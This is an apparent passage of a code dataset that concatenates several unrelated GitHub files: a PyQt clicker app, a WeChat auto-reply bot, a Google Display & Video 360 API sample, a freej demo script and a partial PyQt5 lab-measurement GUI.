MainText(self)\n self.button = Button(self)\n\n def resizeEvent(self, event):\n self.window_width = self.geometry().width()\n self.window_height = self.geometry().height()\n\n self.main_text.update_pos()\n self.button.update_pos()\n\n\nclass MainText:\n def __init__(self, window):\n self.window = window\n self.main_text = QtWidgets.QLabel(self.window)\n self.main_text.setText(f\"Clicks: {self.window.clicked}\")\n self.main_text.adjustSize()\n self.main_text_size = self.main_text.size()\n self.main_text_width = self.main_text_size.width()\n self.main_text_height = self.main_text_size.height()\n self.main_text_pos_x = (self.window.window_width - self.main_text_width) // 2\n self.main_text_pos_y = (self.window.window_height - self.main_text_height) // 2\n self.main_text.move(self.main_text_pos_x, self.main_text_pos_y)\n\n def update_text(self):\n self.main_text.setText(f\"Clicks: {self.window.clicked}\")\n self.main_text.adjustSize()\n\n def update_pos(self):\n self.main_text_pos_x = (self.window.window_width - self.main_text_width) // 2\n self.main_text_pos_y = (self.window.window_height - self.main_text_height) // 2\n self.main_text.move(self.main_text_pos_x, self.main_text_pos_y)\n\n\nclass Button:\n def __init__(self, window):\n self.window = window\n self.btn = QtWidgets.QPushButton(self.window)\n self.text = \"CLICK ME\"\n self.btn.setText(self.text)\n self.btn.setFixedSize(150, 50)\n self.btn_size = self.btn.size()\n self.btn_width = self.btn_size.width()\n self.btn_height = self.btn_size.height()\n self.btn_pos_x = (self.window.window_width - self.btn_width) // 2\n self.btn_pos_y = self.window.main_text.main_text_pos_y + self.window.main_text.main_text_height + 10\n\n self.btn.move(self.btn_pos_x, self.btn_pos_y)\n self.btn.clicked.connect((self.on_click))\n\n def update_pos(self):\n self.btn_pos_x = (self.window.window_width - self.btn_width) // 2\n self.btn_pos_y = self.window.main_text.main_text_pos_y + self.window.main_text.main_text_height + 10\n self.btn.move(self.btn_pos_x, self.btn_pos_y)\n\n def on_click(self):\n self.window.clicked += 1\n self.window.main_text.update_text()\n\n\ndef application():\n app = QApplication(sys.argv)\n window = Window(app)\n\n window.show()\n sys.exit(app.exec_())\n\n\nif __name__ == \"__main__\":\n application()\n\n","repo_name":"polterg3ist/pyqt_clicker","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13111661774","text":"import itchat\nimport json\nimport requests\nfrom itchat.content import *\n\ndef getResponse(_info):\n\t#print(_info)\n\tapiUrl = \"http://openapi.tuling123.com/openapi/api/v2\"\n\tdata = {\n\t\t\"reqType\": 0,\n\t\t\"perception\": {\n\t\t\t\"inputText\": {\n\t\t\t\t\"text\": _info\n\t\t\t},\n\t\t\t\"inputImage\": {\n\t\t\t\t\"url\": _info\n\t\t\t},\n\t\t\t\"selfInfo\": {\n\t\t\t\t\"location\": {\n\t\t\t\t\t\"city\": \"重庆\",\n\t\t\t\t\t\"province\": \"重庆\",\n\t\t\t\t\t\"street\": \"解放碑\"\n\t\t\t\t}\n\t\t\t}\n\t\t},\n\t\t\"userInfo\": {\n\t\t\t\"apiKey\": \"ab2bc8ca07fe46b79842d01418e2d21e\",\n\t\t\t\"userId\": \"wyjason1220\"\n\t\t}\n\t}\n\tdata = json.dumps(data).encode(\"utf-8\") #将字典格式的data(request)编码为utf-8\n\tr = requests.post(apiUrl, data=data).json()\n\treturn r\n\n#自动回复\n# 文字\n@itchat.msg_register(TEXT)\ndef auto_reply(msg):\n\t# NickName = msg['User']['NickName']\n\t# user = itchat.search_friends(name=NickName)[0]\n\t# user.send(u\"山风大哥家的baozi:\" + getResponse(msg['Text'])['results'][0]['values']['text'])\n\tuserid = msg['FromUserName'] # 每个用户和群聊都会使用很长的ID来区分\n\ttemp=getResponse(msg['Text'])\n\n\t#回复新闻\n\t#判断是否是新闻标志类\n\tif temp['intent']['code']==10003: #是\n\t\tif temp['results'][1]['resultType']=='news':\n\t\t\tbuff1=temp['results'][0]['values']['text']\n\t\t\tnews=temp['results'][1]['values']['news']\n\t\t\tbuff2=\"\"\n\t\t\tfor new in news:\n\t\t\t\tbuff2=buff2+\"\\n标题:(\"+new['info']+\")\"+new['name']+\"\\n链接:\"+new['detailurl']\n\t\t\titchat.send(u\"山风大哥家的baozi:\" + buff1 + buff2,userid)\n\t\telse:\n\t\t\tbuff1=temp['results'][1]['values']['text']\n\t\t\tbuff2=temp['results'][0]['values']['url']\n\t\t\titchat.send(u\"山风大哥家的baozi:\"+buff1+\"\\n链接:\"+buff2,userid)\n\t#回复图片\n\telif temp['intent']['code']==10014:\n\t\tbuff1 = temp['results'][1]['values']['text']\n\t\tbuff2 = temp['results'][0]['values']['url']\n\t\titchat.send(u\"山风大哥家的baozi:\" + buff1 + \"\\n链接:\" + buff2, userid)\n\t#回复关键词\n\telif ('秦岚' in msg['Text']) or ('秦岚'in msg['Text']):\n\t\treturn '秦岚(Qin Lan),1981年7月17日出生于辽宁省沈阳市,毕业于沈阳工业大学会计系,中国内地女演员、歌手。\\\n\t\t2001年,出演个人首部电视剧《大唐情史》,从而正式进入演艺圈;2002年,因在古装爱情剧《还珠格格3》中饰演陈知画而崭露头角;\\\n\t\t2003年,出演古装武侠剧《风云2》;2004年,主演古装爱情剧《护花奇缘》;2006年,出演古装励志剧《绣娘兰馨》;\\\n\t\t2007年,因在青春爱情剧《又见一帘幽梦》中饰演汪绿萍而获得更多关注;2009年,出演剧情片《南京!南京!》;\\\n\t\t2011年,凭借家庭伦理片《母语》荣获第三届英国万像国际华语电影节“最具潜力女演员奖”;2012年,凭借古装传奇片\\\n\t\t《王的盛宴》荣获第七届亚洲电影节“最佳女配角”;同年,在古装传奇剧《楚汉传奇》中饰演吕雉;2013年,秦岚推\\\n\t\t出首张个人EP《一肩之隔》;2014年��出演古装武侠剧《神雕侠侣》;2015年,在都市爱情剧《咱们相爱吧》中饰演蔡春妮;\\\n\t\t2017年5月,秦岚担当出品人的网络电影《超级APP》在广州开机;2018年7月,在古装剧《延禧攻略》中饰演富察容音。'\n\telif ('山风大哥' in msg['Text']) or ('山风大哥' in msg['Text']):\n\t\titchat.send(u\"山风大哥家的baozi:喏,就是下面这位小姐姐咯~\", userid)\n\t\titchat.send_image(fileDir='./images/shanfeng.gif', toUserName=userid)\n\t# 普通回复\n\telse:\n\t\titchat.send(u\"山风大哥家的baozi:\" + temp['results'][0]['values']['text'],userid)\n\n# 图片\n@itchat.msg_register(PICTURE)\ndef auto_reply(msg):\n\tNickName = msg['User']['NickName']\n\tuser = itchat.search_friends(name=NickName)[0]\n\tuser.send_image('./images/cute_pig.gif')\n\tdownload_files(msg,user) # 下载图片\n\n#语音\n# @itchat.msg_register(VOICE)\n# def auto_reply(msg):\n# \tNickName = msg['User']['NickName']\n# \tuser = itchat.search_friends(name=NickName)[0]\n# \tuser.send_image('./images/cute_pig.gif')\n\n#处理多媒体类消息(图片、录音、文件、视频)\n@itchat.msg_register([RECORDING,ATTACHMENT,VIDEO])\ndef download_files(msg,user):\n\tmsg['Text'](msg['FileName']) #msg['Text']是一个文件下载函数\n\n\t#向发送者发回去\n\t\"\"\"\n\t\tsend(msg,toUserName)\n\t\tmsg:文本消息内容\n\t\t@fil@path_to_file:发送文件\n\t\t@img@path_to_img:发送图片\n\t\t@vid@path_to_video:发送视频\n\t\t\n\t\tithcat.send(\"@fil@%s\" % '/tmp/test.text')\n\t\tithcat.send(\"@img@%s\" % '/tmp/test.png')\n\t\tithcat.send(\"@vid@%s\" % '/tmp/test.mkv')\n\t\"\"\"\n\tuser.send(u\"山风大哥家的baozi:I have received this %s.\" %msg['Type'])\n\t#return '@%s@%s' % ({'Picture': 'img', 'Video': 'vid'}.get(msg['Type'], 'fil'), msg['FileName'])\n\n#处理好友添加请求\n@itchat.msg_register(FRIENDS)\ndef add_friend(msg):\n\t#该操作会自动将新好友的消息录入,不需要重载通讯录\n\titchat.add_friend(**msg['Text']) #**kwargs表示关键字参数,为dict\n\t#加完好友后,打招呼\n\titchat.send_msg('Nice to meet you!',msg['RecommendInfo']['UserName'])\n\n\nif __name__ == '__main__':\n\titchat.auto_login(hotReload=True)\n\t#向好友发消息\n\t#user = itchat.search_friends(name=u'xxx')[0] #将xxx换成任一好友的昵称\n\t#user.send(u\"很高兴认识你~~\")\n\t\n\t#向文件传输助手发消息\n\titchat.send('Hello,filehelper',toUserName='filehelper')\n\titchat.run()\n","repo_name":"AnRanbel/StudyPython","sub_path":"WeChatAutoReply/auto_reply.py","file_name":"auto_reply.py","file_ext":"py","file_size_in_byte":5358,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34001373168","text":"import argparse\nimport os\nimport sys\n\nfrom googleapiclient.errors import HttpError\n\nsys.path.insert(0, os.path.abspath('..'))\nimport samples_util\n\n\n# Declare command-line flags.\nargparser = argparse.ArgumentParser(add_help=False)\nargparser.add_argument(\n 'advertiser_id',\n help='The ID of the parent advertiser of the line item to which the listed targeting options '\n 'are assigned.')\nargparser.add_argument(\n 'line_item_id',\n help='The ID of the line item to which the listed targeting options are assigned.')\nargparser.add_argument(\n '--browser_del_targeting_ops',\n nargs='+',\n help='The browser assigned targeting options to delete from the line item. Multiple values '\n 'can be listed after declaring the argument. Ex: \"--browser_del_targeting_ops 10001 10002 '\n '10003\"')\nargparser.add_argument(\n '--device_del_targeting_ops',\n nargs='+',\n help='The device type assigned targeting options to delete from the line item. Multiple values '\n 'can be listed after declaring the argument. Ex: \"--device_del_targeting_ops 10001 10002 '\n '10003\"')\nargparser.add_argument(\n '--browser_create_targeting_ops',\n nargs='+',\n help='The browser targeting options to assign to the line item. Multiple values can be listed '\n 'after declaring the argument. Ex: \"--browser_create_targeting_ops 10001 10002 10003\"')\n\n\ndef main(service, flags):\n browser_create_targeting_options = flags.browser_create_targeting_ops\n\n # Build assigned targeting option objects to create.\n if browser_create_targeting_options != None:\n create_browser_assigned_targeting_options = [{\n 'browserDetails': {\n 'targetingOptionId': targeting_id\n }\n } for targeting_id in browser_create_targeting_options]\n else:\n create_browser_assigned_targeting_options = []\n\n # Create a bulk edit request.\n bulk_edit_line_item_request = {\n 'deleteRequests': [{\n 'targetingType': 'TARGETING_TYPE_BROWSER',\n 'assignedTargetingOptionIds': flags.browser_del_targeting_ops\n }, {\n 'targetingType': 'TARGETING_TYPE_DEVICE_TYPE',\n 'assignedTargetingOptionIds': flags.device_del_targeting_ops\n }],\n 'createRequests': [{\n 'targetingType': 'TARGETING_TYPE_BROWSER',\n 'assignedTargetingOptions': create_browser_assigned_targeting_options\n }]\n }\n\n try:\n # Edit the line item targeting.\n response = service.advertisers().lineItems(\n ).bulkEditLineItemAssignedTargetingOptions(\n advertiserId=flags.advertiser_id,\n lineItemId=flags.line_item_id,\n body=bulk_edit_line_item_request).execute()\n except HttpError as e:\n print(e)\n sys.exit(1)\n\n # Check if response is empty.\n # If not, iterate over and display new assigned targeting options.\n if not response:\n print('Bulk edit request created no new AssignedTargetingOptions.')\n else:\n for assigned_targeting_option in response['createdAssignedTargetingOptions']:\n print(f'Assigned Targeting Option {assigned_targeting_option[\"name\"]} was created.')\n\n\nif __name__ == '__main__':\n # Retrieve command line arguments.\n flags = samples_util.get_arguments(sys.argv, __doc__, parents=[argparser])\n\n # Authenticate and construct service.\n service = samples_util.get_service(version='v1')\n\n main(service, flags)\n","repo_name":"googleads/googleads-displayvideo-examples","sub_path":"python/v1/bulk_edit_assigned_targeting_options.py","file_name":"bulk_edit_assigned_targeting_options.py","file_ext":"py","file_size_in_byte":3348,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"25530799981","text":"#!/usr/bin/env python\nimport threading\nimport freej\n\n# context and screen initialization\ncx = freej.Context()\nscr = freej.SdlScreen()\nscr.init(1024,576,32)\ncx.add_screen(scr)\n\n### declare the Trigger Controller\nclass Frame(freej.TriggerController):\n def __init__(self, *args):\n super(Frame, self).__init__(*args)\n\n ### the dispatch function is the callback\n ### it will be called at every frame\n def dispatch(self):\n ### rotate around 360 degrees, incrementing\n ### this function is called once every frame\n if self.i>360:\n self.i=0\n self.i += 1\n self.txt.set_rotate( self.i )\n return 1\n # dispatch should always return an integer value\n\n### create an instance of our Trigger Controller\nf = Frame()\n### set rotation index to zero\nf.i = 0\n### create a text layer inside the controller\nf.txt = freej.TextLayer()\nf.txt.init()\nf.txt.write(\"Hello World!\")\nf.txt.start()\ncx.add_layer(f.txt)\n\n# register it on the current context\nimport pdb; pdb.set_trace() # Start debugger - next line breaks\ncx.register_controller(f)\n\n# start running freej in a separate thread\nth = threading.Thread(target = cx.start , name = \"freej\")\nth.start()\n","repo_name":"rjmunro/freej-python","sub_path":"controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"20240081081","text":"from PyQt5 import QtCore, QtGui, QtWidgets\n\n#<---------------------------\nimport matplotlib\nmatplotlib.use('Qt5Agg') # używamy QT5\n\n#----------------------->\n\n#dla ułatwienia w pisaniu do nazw zmiennych i obiektów dodane zostały odpowiednie przedrostki:\n# p2_ dla pomiaru dwóch próbek tak jak podczas standardowych ćwiczeń \n# r4_ dla pomiaru 4-punktowego (np. przy pomiarze nadprzewodnika)\n# ch20_ dla trybu recznego w którym można będzie mierzyć w seri 20 próbek\n\nclass Ui_MainWindow(object):\n def setupUi(self, MainWindow):\n\n #<----glówne okno-----\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(1200, 815)\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName(\"centralwidget\")\n self.stackedWidget = QtWidgets.QStackedWidget(self.centralwidget)\n self.stackedWidget.setGeometry(QtCore.QRect(10, 10, 1180, 750))\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Expanding)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.stackedWidget.sizePolicy().hasHeightForWidth())\n self.stackedWidget.setSizePolicy(sizePolicy)\n self.stackedWidget.setMinimumSize(QtCore.QSize(0, 0))\n self.stackedWidget.setLineWidth(5)\n self.stackedWidget.setObjectName(\"stackedWidget\")\n #-------------->\n\n#<------tryb pomiar 2 próbek----\n self.P2_tryb = QtWidgets.QWidget()\n self.P2_tryb.setObjectName(\"P2_tryb\")\n\n #<----obszary wykresów------\n self.P2_okno_wykresu_t = QtWidgets.QWidget(self.P2_tryb)\n self.P2_okno_wykresu_t.setGeometry(QtCore.QRect(40, 90, 450, 260))\n self.P2_okno_wykresu_t.setStyleSheet(\"background-color: rgb(255, 255, 255);\")\n self.P2_okno_wykresu_t.setObjectName(\"P2_okno_wykresu_t\")\n\n self.P2_okno_wykresu_p1 = QtWidgets.QWidget(self.P2_tryb)\n self.P2_okno_wykresu_p1.setGeometry(QtCore.QRect(40, 400, 530, 300))\n self.P2_okno_wykresu_p1.setStyleSheet(\"background-color: rgb(255, 255, 255);\")\n self.P2_okno_wykresu_p1.setObjectName(\"P2_okno_wykresu_p1\")\n\n self.P2_okno_wykresu_p2 = QtWidgets.QWidget(self.P2_tryb)\n self.P2_okno_wykresu_p2.setGeometry(QtCore.QRect(610, 400, 530, 300))\n self.P2_okno_wykresu_p2.setStyleSheet(\"background-color: rgb(255, 255, 255);\")\n self.P2_okno_wykresu_p2.setObjectName(\"P2_okno_wykresu_p2\")\n #---------------->\n\n #<-----czekboxy skala log----------\n self.P2_skala_log_t = QtWidgets.QCheckBox(self.P2_tryb)\n self.P2_skala_log_t.setGeometry(QtCore.QRect(50, 355, 141, 22))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.P2_skala_log_t.setFont(font)\n self.P2_skala_log_t.setObjectName(\"P2_skala_log_t\")\n\n self.P2_skala_log_p1 = QtWidgets.QCheckBox(self.P2_tryb)\n self.P2_skala_log_p1.setGeometry(QtCore.QRect(50, 705, 81, 22))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.P2_skala_log_p1.setFont(font)\n self.P2_skala_log_p1.setObjectName(\"P2_skala_log_p1\")\n\n self.P2_skala_log_p2 = QtWidgets.QCheckBox(self.P2_tryb)\n self.P2_skala_log_p2.setGeometry(QtCore.QRect(620, 705, 91, 22))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.P2_skala_log_p2.setFont(font)\n self.P2_skala_log_p2.setObjectName(\"P2_skala_log_p2\")\n #---------------------->\n\n #<------kanały temeperatura----\n self.P2_wybor_kanalow_tekst_t = QtWidgets.QLabel(self.P2_tryb)\n self.P2_wybor_kanalow_tekst_t.setGeometry(QtCore.QRect(330, 355, 95, 22))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.P2_wybor_kanalow_tekst_t.setFont(font)\n self.P2_wybor_kanalow_tekst_t.setObjectName(\"P2_wybor_kanalow_tekst_t\")\n\n self.P2_wybor_kanalow_t = QtWidgets.QComboBox(self.P2_tryb)\n self.P2_wybor_kanalow_t.setGeometry(QtCore.QRect(430, 355, 50, 22))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.P2_wybor_kanalow_t.setFont(font)\n self.P2_wybor_kanalow_t.setObjectName(\"P2_wybor_kanalow_t\")\n self.P2_wybor_kanalow_t.addItem(\"\")\n self.P2_wybor_kanalow_t.addItem(\"\")\n self.P2_wybor_kanalow_t.addItem(\"\")\n self.P2_wybor_kanalow_t.addItem(\"\")\n self.P2_wybor_kanalow_t.addItem(\"\")\n self.P2_wybor_kanalow_t.addItem(\"\")\n self.P2_wybor_kanalow_t.addItem(\"\")\n self.P2_wybor_kanalow_t.addItem(\"\")\n self.P2_wybor_kanalow_t.addItem(\"\")\n self.P2_wybor_kanalow_t.addItem(\"\")\n self.P2_wybor_kanalow_t.addItem(\"\")\n self.P2_wybor_kanalow_t.addItem(\"\")\n self.P2_wybor_kanalow_t.addItem(\"\")\n self.P2_wybor_kanalow_t.addItem(\"\")\n self.P2_wybor_kanalow_t.addItem(\"\")\n self.P2_wybor_kanalow_t.addItem(\"\")\n self.P2_wybor_kanalow_t.addItem(\"\")\n self.P2_wybor_kanalow_t.addItem(\"\")\n self.P2_wybor_kanalow_t.addItem(\"\")\n self.P2_wybor_kanalow_t.addItem(\"\")\n #----------->\n #<---kanały probka 1-------------\n self.P2_wybor_kanalow_tekst_p1 = QtWidgets.QLabel(self.P2_tryb)\n self.P2_wybor_kanalow_tekst_p1.setGeometry(QtCore.QRect(200, 705, 100, 22))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.P2_wybor_kanalow_tekst_p1.setFont(font)\n self.P2_wybor_kanalow_tekst_p1.setObjectName(\"P2_wybor_kanalow_tekst_p1\")\n\n self.P2_wybor_kanalow_p1= QtWidgets.QComboBox(self.P2_tryb)\n self.P2_wybor_kanalow_p1.setGeometry(QtCore.QRect(300, 705, 70, 22))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.P2_wybor_kanalow_p1.setFont(font)\n self.P2_wybor_kanalow_p1.setObjectName(\"P2_wybor_kanalow_p1\")\n self.P2_wybor_kanalow_p1.addItem(\"\")\n self.P2_wybor_kanalow_p1.addItem(\"\")\n self.P2_wybor_kanalow_p1.addItem(\"\")\n self.P2_wybor_kanalow_p1.addItem(\"\")\n self.P2_wybor_kanalow_p1.addItem(\"\")\n self.P2_wybor_kanalow_p1.addItem(\"\")\n self.P2_wybor_kanalow_p1.addItem(\"\")\n self.P2_wybor_kanalow_p1.addItem(\"\")\n self.P2_wybor_kanalow_p1.addItem(\"\")\n self.P2_wybor_kanalow_p1.addItem(\"\")\n self.P2_wybor_kanalow_p1.addItem(\"\")\n self.P2_wybor_kanalow_p1.addItem(\"\")\n self.P2_wybor_kanalow_p1.addItem(\"\")\n self.P2_wybor_kanalow_p1.addItem(\"\")\n self.P2_wybor_kanalow_p1.addItem(\"\")\n self.P2_wybor_kanalow_p1.addItem(\"\")\n self.P2_wybor_kanalow_p1.addItem(\"\")\n self.P2_wybor_kanalow_p1.addItem(\"\")\n self.P2_wybor_kanalow_p1.addItem(\"\")\n self.P2_wybor_kanalow_p1.addItem(\"\")\n #----------->\n\n #<---------kanały próbka 2---------\n self.P2_wybor_kanalow_tekst_p2 = QtWidgets.QLabel(self.P2_tryb)\n self.P2_wybor_kanalow_tekst_p2.setGeometry(QtCore.QRect(770, 705, 100, 22))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.P2_wybor_kanalow_tekst_p2.setFont(font)\n self.P2_wybor_kanalow_tekst_p2.setObjectName(\"P2_wybor_kanalow_tekst_p2\")\n\n self.P2_wybor_kanalow_p2 = QtWidgets.QComboBox(self.P2_tryb)\n self.P2_wybor_kanalow_p2.setGeometry(QtCore.QRect(870, 705, 70, 22))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.P2_wybor_kanalow_p2.setFont(font)\n self.P2_wybor_kanalow_p2.setObjectName(\"P2_wybor_kanalow_p2\")\n self.P2_wybor_kanalow_p2.addItem(\"\")\n self.P2_wybor_kanalow_p2.addItem(\"\")\n self.P2_wybor_kanalow_p2.addItem(\"\")\n self.P2_wybor_kanalow_p2.addItem(\"\")\n self.P2_wybor_kanalow_p2.addItem(\"\")\n self.P2_wybor_kanalow_p2.addItem(\"\")\n self.P2_wybor_kanalow_p2.addItem(\"\")\n self.P2_wybor_kanalow_p2.addItem(\"\")\n self.P2_wybor_kanalow_p2.addItem(\"\")\n self.P2_wybor_kanalow_p2.addItem(\"\")\n self.P2_wybor_kanalow_p2.addItem(\"\")\n self.P2_wybor_kanalow_p2.addItem(\"\")\n self.P2_wybor_kanalow_p2.addItem(\"\")\n self.P2_wybor_kanalow_p2.addItem(\"\")\n self.P2_wybor_kanalow_p2.addItem(\"\")\n self.P2_wybor_kanalow_p2.addItem(\"\")\n self.P2_wybor_kanalow_p2.addItem(\"\")\n self.P2_wybor_kanalow_p2.addItem(\"\")\n self.P2_wybor_kanalow_p2.addItem(\"\")\n self.P2_wybor_kanalow_p2.addItem(\"\")\n #---------------->\n\n #------- osi----\n self.P2_wybor_osix_tekst_p1 = QtWidgets.QLabel(self.P2_tryb)\n self.P2_wybor_osix_tekst_p1.setGeometry(QtCore.QRect(410, 705, 81, 22))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.P2_wybor_osix_tekst_p1.setFont(font)\n self.P2_wybor_osix_tekst_p1.setObjectName(\"P2_wybor_osix_tekst_p1\")\n\n self.P2_wybor_osix_p1 = QtWidgets.QComboBox(self.P2_tryb)\n self.P2_wybor_osix_p1.setGeometry(QtCore.QRect(490, 705, 70, 22))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.P2_wybor_osix_p1.setFont(font)\n self.P2_wybor_osix_p1.setObjectName(\"P2_wybor_osix_p1\")\n self.P2_wybor_osix_p1.addItem(\"\")\n self.P2_wybor_osix_p1.addItem(\"\")\n\n\n self.P2_wybor_osix_tekst_p2 = QtWidgets.QLabel(self.P2_tryb)\n self.P2_wybor_osix_tekst_p2.setGeometry(QtCore.QRect(980, 705, 81, 22))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.P2_wybor_osix_tekst_p2.setFont(font)\n self.P2_wybor_osix_tekst_p2.setObjectName(\"P2_wybor_osix_tekst_p2\")\n\n self.P2_wybor_osix_p2 = QtWidgets.QComboBox(self.P2_tryb)\n self.P2_wybor_osix_p2.setGeometry(QtCore.QRect(1060, 705, 70, 22))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.P2_wybor_osix_p2.setFont(font)\n self.P2_wybor_osix_p2.setObjectName(\"P2_wybor_osix_p2\")\n self.P2_wybor_osix_p2.addItem(\"\")\n self.P2_wybor_osix_p2.addItem(\"\")\n\n #------------->\n\n #<-----start----\n\n self.P2_start = QtWidgets.QPushButton(self.P2_tryb)\n self.P2_start.setGeometry(QtCore.QRect(970, 240, 121, 51))\n font = QtGui.QFont()\n font.setPointSize(12)\n self.P2_start.setFont(font)\n self.P2_start.setObjectName(\"P2_start\")\n\n self.P2_reset = QtWidgets.QPushButton(self.P2_tryb)\n self.P2_reset.setGeometry(QtCore.QRect(970, 300, 120, 30))\n font = QtGui.QFont()\n font.setPointSize(10)\n self.P2_reset.setFont(font)\n self.P2_reset.setObjectName(\"P2_reset\")\n\n self.P2_licznik = QtWidgets.QLabel(self.P2_tryb)\n self.P2_licznik.setGeometry(QtCore.QRect(970, 199, 120, 30))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.P2_licznik.setFont(font)\n self.P2_licznik.setStyleSheet(\"background-color: rgb(255, 255, 255);\")\n self.P2_licznik.setFrameShape(QtWidgets.QFrame.Panel)\n self.P2_licznik.setFrameShadow(QtWidgets.QFrame.Raised)\n self.P2_licznik.setAlignment(QtCore.Qt.AlignCenter)\n self.P2_licznik.setObjectName(\"P2_licznik\")\n #-------------->\n\n #<----czestotliwość-----\n self.P2_czestotliowsc = QtWidgets.QDoubleSpinBox(self.P2_tryb)\n self.P2_czestotliowsc.setGeometry(QtCore.QRect(800, 208, 65, 22))\n self.P2_czestotliowsc.setMinimum(5.0)\n self.P2_czestotliowsc.setMaximum(300.0)\n self.P2_czestotliowsc.setSingleStep(1.0)\n self.P2_czestotliowsc.setProperty(\"value\", 5.0)\n self.P2_czestotliowsc.setObjectName(\"P2_czestotliowsc\")\n \n self.P2_czestotliowsc_tekst = QtWidgets.QLabel(self.P2_tryb)\n self.P2_czestotliowsc_tekst.setGeometry(QtCore.QRect(540, 210, 201, 18))\n font = QtGui.QFont()\n font.setPointSize(9)\n font.setStyleStrategy(QtGui.QFont.PreferDefault)\n self.P2_czestotliowsc_tekst.setFont(font)\n self.P2_czestotliowsc_tekst.setAcceptDrops(False)\n self.P2_czestotliowsc_tekst.setAutoFillBackground(False)\n self.P2_czestotliowsc_tekst.setTextFormat(QtCore.Qt.AutoText)\n self.P2_czestotliowsc_tekst.setWordWrap(True)\n self.P2_czestotliowsc_tekst.setObjectName(\"P2_czestotliowsc_tekst\")\n #------------>\n\n #<--------automatycznie śledzenie i tempo\n self.P2_tempo = QtWidgets.QLabel(self.P2_tryb)\n self.P2_tempo.setGeometry(QtCore.QRect(850-32, 258, 48, 18))\n self.P2_tempo.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)\n font = QtGui.QFont()\n font.setPointSize(9)\n self.P2_tempo.setFont(font)\n self.P2_tempo.setObjectName(\"P2_tempo\")\n\n self.P2_tempo_tekst = QtWidgets.QLabel(self.P2_tryb)\n self.P2_tempo_tekst.setGeometry(QtCore.QRect(540, 250, 181, 36))\n font = QtGui.QFont()\n font.setPointSize(9)\n font.setStyleStrategy(QtGui.QFont.PreferDefault)\n self.P2_tempo_tekst.setFont(font)\n self.P2_tempo_tekst.setAcceptDrops(False)\n self.P2_tempo_tekst.setAutoFillBackground(False)\n self.P2_tempo_tekst.setTextFormat(QtCore.Qt.AutoText)\n self.P2_tempo_tekst.setWordWrap(True)\n self.P2_tempo_tekst.setObjectName(\"P2_tempo_tekst\")\n\n\n self.P2_sledzenie_temp_tekst = QtWidgets.QLabel(self.P2_tryb)\n self.P2_sledzenie_temp_tekst.setGeometry(QtCore.QRect(540, 306, 209, 36))\n font = QtGui.QFont()\n font.setPointSize(9)\n font.setStyleStrategy(QtGui.QFont.PreferDefault)\n self.P2_sledzenie_temp_tekst.setFont(font)\n self.P2_sledzenie_temp_tekst.setAcceptDrops(False)\n self.P2_sledzenie_temp_tekst.setAutoFillBackground(False)\n self.P2_sledzenie_temp_tekst.setTextFormat(QtCore.Qt.AutoText)\n self.P2_sledzenie_temp_tekst.setWordWrap(True)\n self.P2_sledzenie_temp_tekst.setObjectName(\"P2_sledzenie_temp_tekst\")\n\n self.P2_sledzenie_temp_wartosc = QtWidgets.QDoubleSpinBox(self.P2_tryb)\n self.P2_sledzenie_temp_wartosc.setGeometry(QtCore.QRect(800, 311, 70, 22))\n self.P2_sledzenie_temp_wartosc.setMinimum(80.0)\n self.P2_sledzenie_temp_wartosc.setMaximum(300.0)\n self.P2_sledzenie_temp_wartosc.setProperty(\"value\", 250.0)\n self.P2_sledzenie_temp_wartosc.setObjectName(\"P2_sledzenie_temp_wartosc\")\n\n self.P2_sledzenie_temp_okienko = QtWidgets.QCheckBox(self.P2_tryb)\n self.P2_sledzenie_temp_okienko.setGeometry(QtCore.QRect(750, 310, 16, 16))\n self.P2_sledzenie_temp_okienko.setText(\"\")\n self.P2_sledzenie_temp_okienko.setObjectName(\"P2_sledzenie_temp_okienko\")\n #-------------->\n\n #<---temeperatura-----\n self.P2_temperatura_tekst = QtWidgets.QLabel(self.P2_tryb)\n self.P2_temperatura_tekst.setGeometry(QtCore.QRect(540, 170, 190, 18))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.P2_temperatura_tekst.setFont(font)\n self.P2_temperatura_tekst.setObjectName(\"P2_temperatura_tekst\")\n\n self.P2_temperatura= QtWidgets.QLabel(self.P2_tryb)\n self.P2_temperatura.setGeometry(QtCore.QRect(850-32, 170, 48, 18))\n self.P2_temperatura.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)\n font = QtGui.QFont()\n font.setPointSize(9)\n self.P2_temperatura.setFont(font)\n self.P2_temperatura.setObjectName(\"P2_temperatura\")\n #-------->\n \n #<---------moc-----\n self.P2_moc_tekst = QtWidgets.QLabel(self.P2_tryb)\n self.P2_moc_tekst.setGeometry(QtCore.QRect(540, 130, 120, 18))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.P2_moc_tekst.setFont(font)\n self.P2_moc_tekst.setObjectName(\"P2_moc_tekst\")\n\n self.P2_moc = QtWidgets.QLabel(self.P2_tryb)\n 